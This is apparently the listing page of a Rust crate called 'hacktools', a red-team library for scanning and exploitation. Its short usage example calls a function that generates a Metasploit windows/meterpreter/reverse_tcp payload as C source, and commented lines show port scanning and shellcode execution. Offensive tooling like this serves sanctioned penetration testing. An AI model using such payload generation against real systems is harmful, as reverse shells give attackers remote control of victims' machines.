hacktools 1.1.0

A suite library for Red Teams and Hacking consisting of functions for network scanning and web recon trying to get and see through security flaws and exploitation.
Documentation
1
2
3
4
5
6
7
8
9
10
11
12
use std::time::Duration;
use std::io::Error;
use std::io;
use hacktools::{*, tools::{execute_shellcode, msflist}};
fn main() -> Result<(), io::Error> {
    println!("Hello, world!");
    //scan("192.168.0.1", 80..83, Duration::new(5, 0));
    //shell("hello world", execute_shellcode);
    //forbid("http://example.com", "secret");
    msf("windows/meterpreter/reverse_tcp", "127.0.0.1", 909, "", 0, "c", "pop.c");
    Ok(())
}